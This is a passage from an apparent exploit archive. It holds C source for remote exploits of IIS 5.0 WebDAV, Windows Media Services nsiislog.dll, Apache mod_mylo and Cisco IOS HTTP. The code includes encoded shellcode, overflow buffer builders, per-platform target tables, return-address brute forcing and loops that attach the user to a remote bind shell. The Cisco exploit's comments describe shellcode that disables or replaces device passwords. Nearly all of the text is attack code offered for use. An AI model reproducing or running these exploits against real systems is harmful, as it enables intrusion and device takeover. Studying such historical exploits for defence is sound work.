"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\x f7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\x e9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\x f5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\x d7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\x e9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\x f7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\x fa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\x fd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\x f5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\x eb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x 99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\x e1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\x fc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\x f8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\x fe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x 99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x 90\x90";
unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n"
"</g:searchrequest>\r\n";
void usage(char *prog)
{
printf("Remote Exploit for IIS 5.0 WebDAV by Xnuxer\n"
"Bug overflow NTDLL.DLL\n"
"Usage: %s <victim>\n", prog);
exit(-1);
}
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int main(int argc, char **argv)
{
struct hostent *he;
struct sockaddr_in sock1;
struct sockaddr_in sock2;
unsigned short port;
unsigned long ret=RET;
char buffer[100000];
int sock, sck, h,i,j;
if (argc != 2) usage(argv[0]);
printf("Resolving %s .. ", argv[1]);
if ((he = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Unknown host\n");
exit(-1);
}
printf("Resolved\n");
port = htons(31337);
port ^= 0x9999;
*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
bcopy(he->h_addr, &sock1.sin_addr, he->h_length);
sock1.sin_family = AF_INET;
sock1.sin_port = htons(80);
printf("[+] Attacking to %s via port: 80\n", argv[1]);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
exit(-1);
}
if (connect(sock, (struct sockaddr *)&sock1, sizeof(sock1)) == -1)
{
perror("Failed to connect");
exit(-1);
}
bzero(buffer,100000);
strcpy(buffer,"SEARCH /");
i = strlen(buffer);
buffer[i] = NOP;
for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;
for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;
memcpy(&buffer[j], jumpcode, strlen(jumpcode));
strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\n"
"Content-Length: %d\r\n\r\n", argv[1], strlen(body)
+ strlen(shellcode));
strcpy(buffer+strlen(buffer), body);
memset(buffer+strlen(buffer), 0x01, 1);
memset(buffer+strlen(buffer), NOP, 3);
strcpy(buffer+strlen(buffer), shellcode);
if (send(sock, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
exit(-1);
}
printf("[+] Overflow sent, waiting for 5 seconds\n");
sleep(5);
bcopy(he->h_addr, &sock2.sin_addr, he->h_length);
sock2.sin_family = AF_INET;
sock2.sin_port = htons(31337);
printf("[+] Connecting to %s: 31337\n", argv[1]);
if ((sck = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
exit(-1);
}
if (connect(sck, (struct sockaddr *)&sock2, sizeof(sock2)) == -1)
{
printf("[+] Unable to connect.\n"
"[+] Exploitation failed, maybe blocked by firewall.\n");
close(sock);
close(sck);
exit(-1);
}
close(sock);
printf("[+] Successfull, attempting to join shell ...\n\n");
shell(sck);
return 0;
}
// [2003-07-08]
80 MS Windows Media Services (nsiislog.dll) Remote Exploit
#include <stdio.h>
#include <winsock2.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
char *hostName = NULL;
unsigned char shellcode[]=
"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\x c5\x15\x90\x90"
"\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x 97\x40\xe2\xfa"
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x 68\xc4\xf3\x36"
"\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\x a4\x4c\x2c\x97"
"\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x 68\x28\x98\x14"
"\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\x ac\xda\xcd\xe2"
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\x d2\xe2\x4e\x14"
"\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\x ae\xdc\xd2\xc5"
"\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\x a4\x68\x1c\xd1"
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\x c7\xe2\x9e\x16"
"\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x 7c\x72\x94\x68"
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x 1c\x6d\x1c\xd1"
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x 94\xd9\x8b\x94"
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x 60\x1c\x40\xa4"
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\x c5\xc7\xc4\x68"
"\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x 93\xcd\xa4\x57"
"\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x 9e\xc5\xc1\xc4"
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\x cd\x1c\x4f\xa4"
"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x 95\xe3\x9e\xc5"
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\x c7\xd7\xc7\x68"
"\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\x c4\x68\xc0\x67"
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\x df\xc7\xc0\xc1"
"\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x 68\xc0\x57\xdf"
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x 63\x1e\xd0\xab"
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x 96\x96\x1e\xd0"
"\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\x c7\x3a\xc1\xa4"
"\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\x e1\x6b\x68\xc0"
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x 23\x93\xc7\x56"
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x 22\x93\xc7\xc7"
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\x eb\xb5\xa4\x57"
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x 57\xe3\xb8\xa4"
"\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\x c0\x77\x7c\x5f"
//A??A??A??A??A??A??A??A??A??A??SHELLCODEA??A??A??A? ?A?? \xc0\x6b\xa4\x5e\xc6\xc7A??
//A??WRITEFILEA??A??A??2A??A??A??A??A??A??A??A??A??A ??A??A??A??A??A??
"\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xa4\x 5e\xc6\xc0\xc7"
"\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x 7c\x3d\xc7\x68"
"\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\x b3\x9b\x92\x2f"
"\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x 7c\x7b\x7f\x75"
"\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\x b4\x17\x70\xe0"
"\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x 97\xdc\xd2\xc5"
"\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\x c7\xfe\xe7\xf2"
"\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\x f9\xf1\xf8\xd6"
"\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\x e4\xe4\xd6\x97"
"\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\x c7\xf2\xf2\xfc"
"\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\x f8\xf5\xf6\xfb"
"\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\x fe\xfb\xf2\x97"
"\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\x f2\xe7\x97\xd2"
"\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\x c0\xc4\xd8\xd4"
"\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\x fe\xf9\xf3\x97"
"\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\x e3\x97\xe4\xf2"
"\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x 97\x97\x97\x97"
"\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\x f2\xef\xf2\x97"
"\x68\x68\x68\x68";
void main (int argc, char **argv)
{
WSADATA WSAData;
SOCKET s;
SOCKADDR_IN addr_in;
unsigned char buf[1000];
unsigned char testbuf[0x10000];
int len;
char t1[]="POST /scripts/nsiislog.dll HTTP/1.1\r\nHost: 192.168.10.210\r\nContent-length: 65536\r\n\r\n";//4364
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}
hostName = argv[1];
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(80);
addr_in.sin_addr.S_un.S_addr=inet_addr(hostName);
memset(testbuf,0,0x10000);
if ((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVA LID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(s,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCK ET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
len=sizeof(t1)-1;
memcpy(testbuf,t1,len);
send(s,testbuf,len,0);
recv(s,buf,1000,0);
memset(testbuf,'A',65536);//4364
len=65536;//4364;
*(DWORD *)(testbuf+0x2704)=0x04eb06eb;//jmpA??A??A??A??A??A??A??A??
*(DWORD *)(testbuf+0x2708)=0x40F0135c;//A??A??A??A??A??A??A??A??
memcpy(testbuf+0x270c,shellcode,sizeof(shellcode)) ;
send(s,testbuf,len,0);
closesocket (s);
WSACleanup();
return;
}
// [2003-07-14]
80 Apache 1.3.x mod_mylo Remote Code Execution Exploit
/*
Apache + mod_mylo remote exploit
By Carl Livitt / July 2003
carllivitt at hush dot com
Public release - Linux and FreeBSD targets.
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>
#include <stdarg.h>
#define SIZ 8096
#define HTTP_PORT 80
#define SHELL_PORT 45295
#define SOCKET_ERR -2
#define CONNECT_ERR -3
#define HOST_NOT_RESOLVED -4
#define BRUTE_FORCE_EXHAUSTED -5
#define SHELL_NOT_FOUND -7
#define SUCCESS 1
#define FAILED 0
// The following shellcode had 0x3f (?) chars in it which
// cause termination of our HTTP GET before the whole
// shellcode is written to the stack. The 0x3f's are
// needed because they are the dup2() syscall numbers. So,
// I've changed them to 0x3e's and INC'd them before doing
// an INT 0x80. Other than that, this shellcode is eSDee's.
// --------
// linux x86 shellcode by eSDee of Netric (www.netric.org)
// 200 byte - forking portbind shellcode - port=0xb0ef(45295)
char linux_shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66"
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
"\x31\xc9\x89\xf3\xb0\x3e\xfe\xc0\xcd\x80"
"\x31\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31"
"\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
// This shellcode is unchanged (why reinvent the wheel ?):
// --------
/* BSD x86 shellcode by eSDee of Netric (www.netric.org)
* 194 byte - forking portbind shellcode - port=0xb0ef(45295)
*/
char freebsd_shellcode[]=
"\x31\xc0\x31\xdb\x53\xb3\x06\x53"
"\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x89\xc7\x31\xc0\x50"
"\x50\x50\x66\x68\xb0\xef\xb7\x02"
"\x66\x53\x89\xe1\x31\xdb\xb3\x10"
"\x53\x51\x57\x50\xb0\x68\xcd\x80"
"\x31\xdb\x39\xc3\x74\x06\x31\xc0"
"\xb0\x01\xcd\x80\x31\xc0\x50\x57"
"\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
"\xdb\x50\x89\xe1\xb3\x01\x53\x89"
"\xe2\x50\x51\x52\xb3\x14\x53\x50"
"\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
"\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
"\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
"\x39\xc3\x75\x44\x31\xc0\x57\x50"
"\xb0\x06\xcd\x80\x31\xc0\x50\x56"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
"\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
"\x80\x31\xc0\x43\x53\x56\x50\xb0"
"\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x54\x53\x50\xb0\x3b"
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\x56\x50\xb0\x06\xcd\x80"
"\xeb\x9a";
struct {
char *platform;
unsigned long bruteStart, bruteEnd;
unsigned long retAddr;
int offset, len;
char *shellcodePtr;
} targets[]= {
{ "SuSE 8.1, Apache 1.3.27 (installed from source) (default)", 0x08117c04,
0x08117dff, 0xbfffe9f0, 500, 4104, linux_shellcode },
{ "RedHat 7.2, Apache 1.3.20 (installed from RPM)", 0x08105104, 0x081051ff,
0xbfffe0b0, 1000, 4104, linux_shellcode },
{ "RedHat 7.3, Apache 1.3.23 (installed from RPM)", 0x080ef304, 0x080ef3ff,
0xbfffe190, 750, 4104, linux_shellcode },
{ "FreeBSD 4.8, Apache 1.3.27 (from Ports)", 0x080bf004, 0x080bf0ff, 0xbfbfea50
,3500, 4096, freebsd_shellcode },
NULL
};
char usage[]=
"Apache + mod_mylo remote exploit\n"
"By Carl Livitt (carllivitt at hush dot com)\n\n"
"Arguments: \n"
" -t target Attack 'target' host\n"
" -T platform Use parameters for target 'platform'\n"
" -h This help.\n";
void my_send(int, char *, ...);
void my_recv(int);
void make_exploitbuf(char *);
int connect_to_host(int);
int attempt_exploit(void);
void my_sleep(int n);
unsigned long retAddr=0,magic_r=0,MAGIC_R_START,MAGIC_R_END, exactPointerAddy=0;
char buf[SIZ], host[SIZ]="";
int useTarget=0;
struct hostent *hostStruct;
main(int argc, char **argv) {
int ch, i;
while((ch=getopt(argc, argv, "t:T:e:hr:"))!=-1) {
switch(ch) {
case 't':
strncpy(host, optarg, SIZ-1);
break;
case 'T':
useTarget=atoi(optarg);
break;
case 'e':
exactPointerAddy=strtoul(optarg,NULL,16);
break;
case 'r':
retAddr=strtoul(optarg,NULL,16);
break;
case 'h':
default:
printf("%s\n",usage);
printf("Available platforms:\n");
for(i=0;targets[i].platform;i++)
printf("%2d. %s\n", i, targets[i].platform);
printf("\n");
exit(0);
break; // it's good practice :)
}
}
// Sanity check
if(!retAddr && exactPointerAddy) {
printf(" You must give RET address when specifying a pointer address\n");
printf(" A good place to start is 0xbfffe0b0(linux) or 0xbfbfe0b0(freeBSD)\n");
printf(" Also remember to pass a -T x flag... things will be unpredictable\n");
printf(" if you don't!\n");
exit(0);
}
if((hostStruct=gethostbyname(host))==NULL) {
printf(" Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]);
exit(0);
}
switch(attempt_exploit()) {
case HOST_NOT_RESOLVED:
printf(" Couldn't connect to host: %s not found.\n", host);
break;
case SOCKET_ERR:
printf(" Couldn't grab a socket!\n");
break;
case CONNECT_ERR:
printf(" Connection to %s was rejected\n",host);
break;
case SHELL_NOT_FOUND:
printf(" This attempt failed ...\n");
break;
case BRUTE_FORCE_EXHAUSTED:
printf(" Bruteforce failed.\n");
break;
case SUCCESS:
break;
default:
printf(" ERROR: There was no error!\n");
break;
}
printf("\nHave a nice day!\n");
exit(0);
}
int attempt_exploit(void) {
fd_set rfds;
int sock,retVal,r;
if(exactPointerAddy) {
printf("[-] Using 0x%08x for pointer addy\n", exactPointerAddy);
if((sock=connect_to_host(HTTP_PORT))<=0)
return sock;
magic_r=exactPointerAddy;
make_exploitbuf(buf);
my_send(sock, buf);
my_recv(sock);
close(sock);
my_sleep(100000);
if((sock=connect_to_host(SHELL_PORT))<=0) {
return sock;
}
} else { // Do crappy bruteforce loop
printf("[-] Attempting attack [ %s ] ...\n", targets[useTarget].platform);
MAGIC_R_START=targets[useTarget].bruteStart;
MAGIC_R_END=targets[useTarget].bruteEnd;
retAddr=targets[useTarget].retAddr;
for(magic_r=MAGIC_R_START; magic_r<=MAGIC_R_END; magic_r++) {
printf("[-] Trying 0x%08x ... \r", magic_r);fflush(stdout);
if((sock=connect_to_host(HTTP_PORT))<=0)
return sock;
make_exploitbuf(buf);
my_send(sock, buf);
my_recv(sock);
close(sock);
my_sleep(50000);
if((sock=connect_to_host(SHELL_PORT))>=SUCCESS) {
printf("\n[-] Found request_rec address @ 0x%08x\n", magic_r);
break;
}
}
if(magic_r>MAGIC_R_END)
return BRUTE_FORCE_EXHAUSTED;
}
printf("[-] Connected to %s! You can type commands now:\n", host);
// Now let the attacker issue commands to the remote
// shell, just as if (s)he had launched 'nc host 45295'.
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
retVal=select(sock+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sock, &rfds)) {
buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
send(sock, buf, strlen(buf), 0);
}
}
} while(retVal && r); // loop until connection terminates
close(sock);
return SUCCESS;
}
// Given a port number, connects to an already resolved hostname...
// connects a TCP stream and returns a socket number (or returns error)
int connect_to_host(int p) {
int sock;
struct sockaddr_in saddr;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1)
return SOCKET_ERR;
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)hostStruct->h_addr_list[0]);
saddr.sin_port=htons(p);
if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
close(sock);
return CONNECT_ERR;
} else
return sock;
}
void make_exploitbuf(char *b) {
unsigned long *ptr;
char *sc=(char *)&targets[useTarget].shellcodePtr[0];
memset(b,0x00,SIZ-1);
strcat(b,"GET ");
memset(b+4,0x90,targets[useTarget].len);
memcpy((b+targets[useTarget].len)-(strlen(sc)+targets[useTarget].offset)-9,sc,strlen(sc));
ptr=(unsigned long *)&b[strlen(b)];
*(ptr++)=retAddr;
*ptr=magic_r;
strcat(b, "\n\n");
}
// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...) {
va_list ap;
char *buf;
va_start(ap,b);
vasprintf(&buf,b,ap);
send(s,buf,strlen(buf),0);
va_end(ap);
free(buf);
}
// Another handy function to read data from a socket.
void my_recv(int s) {
int len;
char buf[SIZ];
len=recv(s, buf, SIZ-1, 0);
buf[len]=0;
}
// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n) {
struct timespec t;
t.tv_sec=0;
t.tv_nsec=n;
nanosleep(&t,&t);
}
// [2003-07-28]
80 Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit
/*
* ..--==[[ Phenoelit ]]==--..
* / \
* | CISCO CASUM EST |
* \.. ../
* ~~---==(MMIII)==---~~
*
*
* Cisco IOS 12.x/11.x remote exploit for HTTP integer overflow in URL using
* IOS 11.x UDP Echo memory leak for shellcode placing and address calculation.
*
* This code does support exploitation of any 11.x Cisco 1600 and 2500 series
* running "ip http server" and "service udp-small-servers". In other words,
* port 80 TCP and port 7 UDP have to be open. The exploitation will take a
* very long time since the overflow is triggered by sending 2 Gigabytes of
* data to the device. Depending on your connection to the target, this may
* take up to several DAYS.
*
* Shellcodes:
* o In case a 1600 running 11.3(11b) IP only is detected, a runtime IOS
* patching shellcode is used. After that, the device will no longer
* validate VTY and enable access passwords. Mission accomplished.
* o In case of any other 11.x IOS or in case it runs from flash where
* code patching is more complicated, the shellcode will replace all
* passwords in the config with "phenoelit" and reboot the box. Change
* the passwords in the shellcodes if you like.
*
* ---
* FX of Phenoelit <fx at phenoelit.de>
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <rpc/types.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include "protocols.h"
#include "packets.h"
char m68nop[] = "\x4E\x71";
char returncode[] =
"\x24\x7c\x02\x0b\xfe\x30" //moveal #34340400,%a2 (0x00000000)
"\x34\xbc\x4e\x75" //movew #20085,%a2@ (0x00000006)
"\x24\x7c\x02\x04\xae\xfa" //moveal #33861370,%a2 (0x0000000A)
"\x24\xfc\x30\x3c\x00\x01" //movel #809238529,%a2@+ (0x00000010)
"\x24\xfc\x4c\xee\x04\x0c" //movel #1290667020,%a2@+ (0x00000016)
"\x24\xfc\xff\xf4\x4e\x5e" //movel #-766370,%a2@+ (0x0000001C)
"\x24\xfc\x4e\x75\x00\x00" //movel #1316290560,%a2@+ (0x00000022)
"\x24\x7c\x02\x07\x21\x6a" //moveal #34021738,%a2 (0x00000028)
"\x34\xbc\x4e\x71" //movew #20081,%a2@ (0x0000002E)
"\x24\x4f" //moveal %sp,%a2 (0x00000032)
"\x0c\x1f\x00\x02" //cmpib #2,%sp@+ (0x00000034)
"\x0c\x97\x02\x19\xfc\xc0" //cmpil #35257536,%sp@ (0x00000038)
"\x66\x00\xff\xf4" //bnew 34 <findret> (0x0000003E)
"\x24\x8f" //movel %sp,%a2@ (0x00000042)
"\x59\x92" //subql #4,%a2@ (0x00000044)
"\x2c\x52" //moveal %a2@,%fp (0x00000046)
"\x42\x80" //clrl %d0 (0x00000048)
"\x4c\xee\x04\x00\xff\xfc" //moveml %fp@(-4),%a2 (0x0000004A)
"\x4e\x5e" //unlk %fp (0x00000050)
"\x4e\x75" //rts (0x00000052)
;
char modcfg[] =
"\x20\x7c\x0f\xf0\x10\xc2" //moveal #267391170,%a0 (0x00000000)
"\xe2\xd0" //lsrw %a0@ (0x00000006)
"\x46\xfc\x27\x00" //movew #9984,%sr (0x00000008)
"\x20\x7c\x0f\xf0\x10\xc2" //moveal #267391170,%a0 (0x0000000C)
"\x30\xbc\x00\x01" //movew #1,%a0@ (0x00000012)
"\x20\x7c\x0e\x00\x00\x00" //moveal #234881024,%a0 (0x00000016)
"\x54\x88" //addql #2,%a0 (0x0000001C)
"\x0c\x50\xab\xcd" //cmpiw #-21555,%a0@ (0x0000001E)
"\x66\xf8" //bnes 1c <find_magic> (0x00000022)
"\x22\x48" //moveal %a0,%a1 (0x00000024)
"\x58\x89" //addql #4,%a1 (0x00000026)
"\x24\x49" //moveal %a1,%a2 (0x00000028)
"\x50\x8a" //addql #8,%a2 (0x0000002A)
"\x50\x8a" //addql #8,%a2 (0x0000002C)
"\x0c\x12\x00\x00" //cmpib #0,%a2@ (0x0000002E)
"\x67\x28" //beqs 5c <end_of_config> (0x00000032)
"\x4b\xfa\x00\xc6" //lea %pc@(fc <S_password>),%a5 (0x00000034)
"\x61\x5a" //bsrs 94 <strstr> (0x00000038)
"\x4a\x80" //tstl %d0 (0x0000003A)
"\x67\x08" //beqs 46 <next1> (0x0000003C)
"\x28\x40" //moveal %d0,%a4 (0x0000003E)
"\x4b\xfa\x00\xcf" //lea %pc@(111 <REPLACE_password>),%a5 (0x00000040)
"\x61\x62" //bsrs a8 <nvcopy> (0x00000044)
"\x4b\xfa\x00\xc0" //lea %pc@(108 <S_enable>),%a5 (0x00000046)
"\x61\x48" //bsrs 94 <strstr> (0x0000004A)
